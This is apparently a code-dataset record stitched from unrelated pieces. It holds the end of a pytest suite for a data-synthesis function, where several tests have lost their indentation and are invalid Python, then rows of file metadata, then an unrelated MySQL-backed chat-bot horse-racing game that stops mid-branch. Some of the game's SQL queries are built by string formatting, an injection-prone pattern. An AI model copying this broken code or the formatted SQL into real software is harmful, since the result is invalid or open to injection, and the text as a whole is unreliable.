            df, target, alloc_id, constraint_df, constraint_units)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            constraint_expr=constraint_expr)
    assert len(result) == target
    pdt.assert_frame_equal(result, df)


@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    # target above current length: rows are synthesized (seeded RNG pins
    # the expected frame).
    target = 8
    if not scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            constraint_expr=constraint_expr)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c'],
             count: [1, 2, 3, 4, 5, 5, 1, 4]}))


@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add_filters(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    # With filters, only the filtered subset is driven towards `target`.
    target = 3
    filters = '{} < 2'.format(count)
    if not scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units,
            filters=filters)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            filters=filters, constraint_expr=constraint_expr)
    assert len(result.query(filters)) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
             count: [1, 2, 3, 4, 5, 1, 1]}))


@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add_stuff(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    # stuff=True: every synthesized row receives an allocation id.
    target = 10
    stuff = True
    if not scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units, stuff=stuff)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            constraint_expr=constraint_expr, stuff=stuff)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
             count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))


@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_add_no_stuff(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    # stuff=False: the overflow row keeps a None id.
    target = 10
    stuff = False
    if not scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units, stuff=stuff)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            constraint_expr=constraint_expr, stuff=stuff)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
             count: [1, 2, 3, 4, 5, 5, 1, 4, 4, 4]}))


@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_remove(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    # target below current length: rows are removed.
    target = 3
    if not scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            constraint_expr=constraint_expr)
    assert len(result) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['b', 'c', 'b'],
             count: [2, 3, 4]},
            index=[1, 2, 3]))


@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_remove_filters(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    # Removal restricted to the filtered subset; unfiltered rows survive.
    target = 1
    filters = '{} > 3'.format(count)
    if not scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units,
            filters=filters)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            filters=filters, constraint_expr=constraint_expr)
    assert len(result.query(filters)) == target
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'c'],
             count: [1, 2, 3, 5]},
            index=[0, 1, 2, 4]))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_noop(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = df[count].sum()
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units, count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(result, df)
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 18
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units, count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b'],
count: [1, 2, 3, 4, 5, 3]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add_filters(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 18
filters = '{} > 3'.format(count)
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
filters=filters, count=count)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
filters=filters, constraint_expr=constraint_expr, count=count)
assert result.query(filters)[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
count: [1, 2, 3, 4, 5, 5, 4]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add_stuff(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 30
stuff = True
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
count=count, stuff=stuff)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count, stuff=stuff)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', 'a'],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_add_no_stuff(
seed, df, alloc_id, count, constraint_df, constraint_units,
constraint_expr, scaled_test):
target = 30
stuff = False
if not scaled_test:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df, constraint_units,
count=count, stuff=stuff)
else:
result = syn.synthesize_one(
df, target, alloc_id, constraint_df,
constraint_expr=constraint_expr, count=count, stuff=stuff)
assert result[count].sum() == target
pdt.assert_frame_equal(
result,
pd.DataFrame(
{alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', 'c', None],
count: [1, 2, 3, 4, 5, 5, 4, 3, 2, 1]}))
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_remove(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    """A target below the current total removes rows from the tail in both
    plain and scaled modes."""
    target = 10
    if scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            constraint_expr=constraint_expr, count=count)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units,
            count=count)
    assert result[count].sum() == target
    expected = pd.DataFrame(
        {alloc_id: ['a', 'b', 'c', 'b'],
         count: [1, 2, 3, 4]})
    pdt.assert_frame_equal(result, expected)
@pytest.mark.parametrize('scaled_test', [False, True])
def test_synthesize_one_count_remove_filters(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_expr, scaled_test):
    """Removal with a filter: only filtered rows count toward the target;
    the surviving frame keeps its original (non-zero-based) index."""
    target = 2
    filters = '{} < 3'.format(count)
    if scaled_test:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df,
            filters=filters, constraint_expr=constraint_expr, count=count)
    else:
        result = syn.synthesize_one(
            df, target, alloc_id, constraint_df, constraint_units,
            filters=filters, count=count)
    assert result.query(filters)[count].sum() == target
    expected = pd.DataFrame(
        {alloc_id: ['b', 'c', 'b', 'c'],
         count: [2, 3, 4, 5]},
        index=[1, 2, 3, 4])
    pdt.assert_frame_equal(result, expected)
def test_synthesize_one_27bug(
        alloc_id, count, constraint_df, constraint_units):
    # Regression check: counting values in the count column while also
    # filtering on that same column used to make the totals disagree.
    frame = pd.DataFrame(
        {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c'],
         count: [1, 2, 3, 4, 5, 5, 1]})
    target = 27
    filters = '{} > 3'.format(count)
    result = syn.synthesize_one(
        frame, target, alloc_id, constraint_df, constraint_units,
        filters=filters, count=count, stuff=False)
    assert result.query(filters)[count].sum() == target
def test_synthesize_from_table(
        seed, df, alloc_id, count, constraint_df, constraint_units,
        constraint_scaled, constraint_expr):
    """End-to-end check of synthesize_from_table.

    Each row of *targets* describes one synthesis job: a target value, the
    geography column, optional comma-separated filters, an optional count
    column, a capacity column or expression, and a stuff flag (NaN where a
    field does not apply to that job).
    """
    targets = pd.DataFrame(
        {'target_value': [7, 27, 1, 1],
         'geo_id_col': [alloc_id] * 4,
         'filters': [
             np.nan,
             '{} > 3'.format(count),
             '{} == "a",{} == 1'.format(alloc_id, count),
             '{} == 1'.format(count)],
         'count': [np.nan, count, np.nan, count],
         'capacity_col': [
             constraint_units, np.nan, constraint_units, constraint_units],
         'capacity_expr': [np.nan, constraint_expr, np.nan, constraint_expr],
         'stuff': [np.nan, False, True, True]})
    result = syn.synthesize_from_table(df, constraint_df, targets)
    # Expected index is non-contiguous (6 is missing): the combined jobs
    # drop one original row and append new ones, including an unallocated
    # (None) row at the end.
    pdt.assert_frame_equal(
        result,
        pd.DataFrame(
            {alloc_id: ['a', 'b', 'c', 'b', 'c', 'b', 'c', 'c', None],
             count: [1, 2, 3, 4, 5, 5, 5, 4, 4]},
            index=[0, 1, 2, 3, 4, 5, 7, 8, 9]))
| 29.376486
| 79
| 0.594073
| 2,979
| 22,238
| 4.200403
| 0.040953
| 0.071046
| 0.077439
| 0.014065
| 0.906497
| 0.880524
| 0.849996
| 0.82722
| 0.803804
| 0.791577
| 0
| 0.020322
| 0.263153
| 22,238
| 756
| 80
| 29.415344
| 0.743317
| 0.005576
| 0
| 0.768959
| 0
| 0
| 0.027
| 0
| 0
| 0
| 0
| 0
| 0.135802
| 1
| 0.091711
| false
| 0
| 0.008818
| 0.014109
| 0.116402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db35bebae58e3c096f83118941d808f5719cf3d7
| 59,497
|
py
|
Python
|
horserace_source.py
|
snowingforest/wcbot
|
6496a6947d924b44729c757f06f367e375d90d78
|
[
"Apache-2.0"
] | null | null | null |
horserace_source.py
|
snowingforest/wcbot
|
6496a6947d924b44729c757f06f367e375d90d78
|
[
"Apache-2.0"
] | null | null | null |
horserace_source.py
|
snowingforest/wcbot
|
6496a6947d924b44729c757f06f367e375d90d78
|
[
"Apache-2.0"
] | null | null | null |
import pymysql
from DBUtils.PooledDB import PooledDB
import random
from basefunction import get_nick_name
from config import *
def calculate_damage(attack, defense, damage_fix):
    """Convert an attack against a defense into a knock-back step count.

    Effective damage is ``attack + damage_fix - defense``.  Every full 6
    points of damage is one guaranteed step; the remainder grants one extra
    step with probability remainder/6, decided by a d6 roll.  Non-positive
    damage moves nothing.
    """
    damage = attack + damage_fix - defense
    if damage <= 0:
        return 0
    guaranteed, remainder = divmod(damage, 6)
    roll = random.randint(1, 6)
    return guaranteed + 1 if roll <= remainder else guaranteed
class HorseRace:
    def __init__(self):
        # Shared pymysql connection pool for the 'horserace' database.
        # Connection settings (DB_HOST etc.) come from the config module.
        # blocking=True makes callers wait for a free connection instead of
        # raising; ping=0 presumably disables liveness pings on checkout —
        # confirm against the DBUtils PooledDB documentation.
        self.db_pool = PooledDB(creator=pymysql, host=DB_HOST, port=DB_PORT, user=DB_USER, password=DB_PWD,
                                database='horserace', blocking=True, ping=0)
async def race_state(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select state from race_state"
cursor.execute(sql)
state = cursor.fetchone()
cursor.close()
db.close()
return state[0]
async def set_state(self, state):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "update race_state set state = %s" % state
cursor.execute(sql)
db.commit()
cursor.close()
db.close()
async def add_winner(self, chara_name):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "update chara_data set win_time = win_time + 1 where name = %s"
cursor.execute(sql, chara_name)
db.commit()
cursor.close()
db.close()
async def add_race(self, chara_name):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "update chara_data set race_time = race_time + 1 where name = %s"
cursor.execute(sql, chara_name)
db.commit()
cursor.close()
db.close()
async def join_gamble(self, player_id, horse_id):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "insert into gamble(player_id, horse_id) values (%s, %s)" % (player_id, horse_id)
try:
result = cursor.execute(sql)
db.commit()
except BaseException:
result = 0
cursor.close()
db.close()
return result
async def search_gamble(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from gamble"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def end_race(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "truncate table gamble"
cursor.execute(sql)
sql = "truncate table horse"
cursor.execute(sql)
sql = "update race_state set state = -1"
cursor.execute(sql)
db.commit()
cursor.close()
db.close()
async def win_rate_stat(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select name, win_time, race_time, if(race_time = 0, 0, win_time / race_time) as win_rate from chara_data where stars >= 2 order by win_rate"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def get_chara_data(self, chara_name):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from chara_data where name = %s"
cursor.execute(sql, chara_name)
chara = cursor.fetchone()
cursor.close()
db.close()
return chara
    async def add_horse(self, chara):
        """Enter *chara* into the horse table for the coming race.

        Re-reads the character's row from chara_data before inserting, so
        the horse gets the latest atk/satk/def/sdef/tp values rather than
        whatever stale tuple the caller passed in.
        """
        # Assumes chara[1] is the character name and chara[2] the owning
        # player id — consistent with how get_chara_data is keyed; confirm
        # against the chara_data schema.
        chara_name = chara[1]
        player_id = chara[2]
        db = self.db_pool.connection()
        cursor = db.cursor()
        chara_new = await self.get_chara_data(chara_name)
        # Indices 3..7 of the fresh row map onto atk, satk, def, sdef, tp
        # in the insert column list below.
        sql = "insert into horse(name, player_id, atk, satk, def, sdef, tp) values (%s, %s, %s, %s, %s, %s, %s)"
        log = (chara_name, player_id, chara_new[3], chara_new[4], chara_new[5], chara_new[6], chara_new[7])
        cursor.execute(sql, log)
        db.commit()
        cursor.close()
        db.close()
async def search_horse(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse order by id"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def search_sorted_horse(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse order by position desc"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def search_sorted_horse_ascend(self):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse order by position"
cursor.execute(sql)
result = cursor.fetchall()
cursor.close()
db.close()
return result
async def get_single_target(self, horse):
horse_list = await self.search_sorted_horse()
first_horse = horse_list[0]
for target_horse in horse_list:
if target_horse[0] != horse[0] and target_horse[3] == first_horse[3]:
return target_horse
return first_horse
async def search_horse_by_position(self, position):
horse_list = await self.search_sorted_horse()
return horse_list[position - 1]
async def get_horse_position(self, horse):
horse_list = await self.search_sorted_horse()
for i in range(len(horse_list)):
if horse_list[i][0] == horse[0]:
return i + 1
async def search_horse_by_player(self, player_id):
db = self.db_pool.connection()
cursor = db.cursor()
sql = "select * from horse where player_id = %s"
cursor.execute(sql, player_id)
result = cursor.fetchone()
cursor.close()
db.close()
return result
    async def move_horse(self, horse_id):
        """Advance one horse by its attack stat and regenerate its tp.

        Returns the number of steps moved (partly random, see below).
        """
        db = self.db_pool.connection()
        cursor = db.cursor()
        sql = "select * from horse where id = %s"
        cursor.execute(sql, horse_id)
        result = cursor.fetchone()
        # Apparent horse-row layout (inferred from usage across methods —
        # confirm against the schema): [3]=position, [4]=current_tp,
        # [5]=atk, [6]=satk, [9]=tp growth bonus.
        atk = max(result[5], result[6])  # move off the better of the two attack stats
        position = result[3]
        tp = result[4]
        tp_up = result[9]
        # Same step formula as calculate_damage: one guaranteed step per
        # full 6 points, plus one extra step with probability (atk % 6)/6.
        base_move = atk // 6
        extra_move = atk % 6
        r = random.randint(1, 6)
        if r <= extra_move:
            move = base_move + 1
        else:
            move = base_move
        # Track is capped at position 10; tp regains 20 (+10 per bonus
        # point) up to a maximum of 100.
        position = min(position + move, 10)
        tp = min(100, tp + 20 + tp_up * 10)
        sql = "update horse set position = %s, current_tp = %s where id = %s"
        log = (position, tp, horse_id)
        cursor.execute(sql, log)
        db.commit()
        cursor.close()
        db.close()
        return move
    async def god_attack(self, group_id):
        """Random "act of god" event: knock back one horse or all of them.

        Rolls an attack mode over range(len(horses) + 4): values 0-3 hit
        every horse (AOE, damage_fix 0), larger values hit the single horse
        at index (mode - 4) with damage_fix 1.  The attack is randomly
        physical or magical and is resisted by the matching defense stat
        (row index 7 = physical, 8 = magical).  Returns the Chinese-language
        announcement text for the chat group.
        """
        db = self.db_pool.connection()
        cursor = db.cursor()
        god_atk = 7
        response = ""
        attack = ("物理", "魔法")  # runtime strings: "physical", "magic"
        horse_list = await self.search_horse()
        attack_mode = random.randint(0, len(horse_list) + 3)
        attack_type = random.randint(0, 1)
        if attack_mode <= 3:
            # AOE branch: every horse takes an unboosted hit.
            for horse in horse_list:
                response += "上帝对%s号马%s的%s发动了%s攻击," % (horse[0], await get_nick_name(group_id, horse[2]), horse[1], attack[attack_type])
                move = calculate_damage(god_atk, horse[7 + attack_type], 0)
                if move > 0:
                    response += '击退了%s步。\n' % move
                else:
                    response += '没有效果。\n'
                # Positions never drop below the start of the track (1).
                position = max(1, horse[3] - move)
                sql = "update horse set position = %s where id = %s" % (position, horse[0])
                cursor.execute(sql)
        else:
            # Single-target branch: one horse takes a slightly boosted hit.
            target = attack_mode - 3
            horse = horse_list[target - 1]
            response += "上帝对%s号马%s的%s发动了%s攻击," % (horse[0], await get_nick_name(group_id, horse[2]), horse[1], attack[attack_type])
            move = calculate_damage(god_atk, horse[7 + attack_type], 1)
            if move > 0:
                response += '击退了%s步。\n' % move
            else:
                response += '没有效果。\n'
            position = max(1, horse[3] - move)
            sql = "update horse set position = %s where id = %s" % (position, horse[0])
            cursor.execute(sql)
        db.commit()
        cursor.close()
        db.close()
        return response
async def ub(self, horse, group_id):
db = self.db_pool.connection()
cursor = db.cursor()
if horse[1] == "镜华":
response = "%s号马%s的%s使用了【太虚苍蓝闪】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 4
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "杏奈":
response = "%s号马%s的%s使用了【罗刹涅槃・极光终天冥坏破】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 3
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 0, sdef = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "真步":
response = "%s号马%s的%s使用了【童话之庭】!自己的双防上升了!tp中度恢复了!向前冲了1步!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
position = min(10, horse[3] + 1)
sql = "update horse set current_tp = 40, def = 9, sdef = 7, position = %s where id = %s" % (position, horse[0])
cursor.execute(sql)
elif horse[1] == "璃乃":
response = "%s号马%s的%s使用了【箭雨】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
r = random.randint(0, 1)
if r <= 0:
damage_fix = 3
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "初音":
response = "%s号马%s的%s使用了【流星☆】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
damage_fix = 0
if target_horse[5] > 0:
damage_fix = 3
move = calculate_damage(horse[6], target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "依绪":
response = "%s号马%s的%s使用了【心形love风暴】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(max(target_horse[5], target_horse[6], horse[6]), target_horse[8], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "咲恋":
response = "%s号马%s的%s使用了【不死鸟之剑】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = await self.get_horse_position(horse)
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "望":
response = "%s号马%s的%s使用了【Live-Onstage】!自己的双防提升了!自己的攻击提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
sql = "update horse set current_tp = 0, def = 10, sdef = 6, atk = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "扇子":
response = "%s号马%s的%s使用了【忍法灼热地狱】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
tp_up = 0
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
tp_up += 20
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = %s where id = %s" % (tp_up, horse[0])
cursor.execute(sql)
elif horse[1] == "真琴":
response = "%s号马%s的%s使用了【沃尔芬之咬】!目标的物防下降了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
def_fix = 0
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
def_fix = 2
target_position = max(1, target_horse[3] - move)
target_def = max(0, target_horse[7] - def_fix)
sql = "update horse set position = %s, def = %s where id = %s" % (target_position, target_def, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "纯":
response = "%s号马%s的%s使用了【地狱之盾】!自己的双防提升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
sql = "update horse set current_tp = 0, def = 6, sdef = 9 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "静流":
response = "%s号马%s的%s使用了【神圣惩处】!自己的物防上升了!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, def = 8 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "毛二力":
response = "%s号马%s的%s使用了【紫电一闪】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
horse_list = await self.search_horse()
for target_horse in horse_list:
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0, atk = 6, tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "姬塔":
response = "%s号马%s的%s使用了【暴风雨之剑】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 2
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "亚里莎":
response = "%s号马%s的%s使用了【我的箭将把你贯穿】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 1
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "哈哈剑":
response = "%s号马%s的%s使用了【高贵谴击】!\n" % (horse[0], await get_nick_name(group_id, horse[2]), horse[1])
damage_fix = 4
target_horse = await self.get_single_target(horse)
move = 0
if target_horse[0] != horse[0]:
move = calculate_damage(horse[5], target_horse[7], damage_fix)
if move == 0:
response += "%s鸽了\n" % horse[1]
else:
response += "把%s号马%s的%s击退了%s步\n" % (
target_horse[0], await get_nick_name(group_id, target_horse[2]), target_horse[1], move)
target_position = max(1, target_horse[3] - move)
sql = "update horse set position = %s where id = %s" % (target_position, target_horse[0])
cursor.execute(sql)
sql = "update horse set current_tp = 0 where id = %s" % horse[0]
cursor.execute(sql)
elif horse[1] == "宫子":
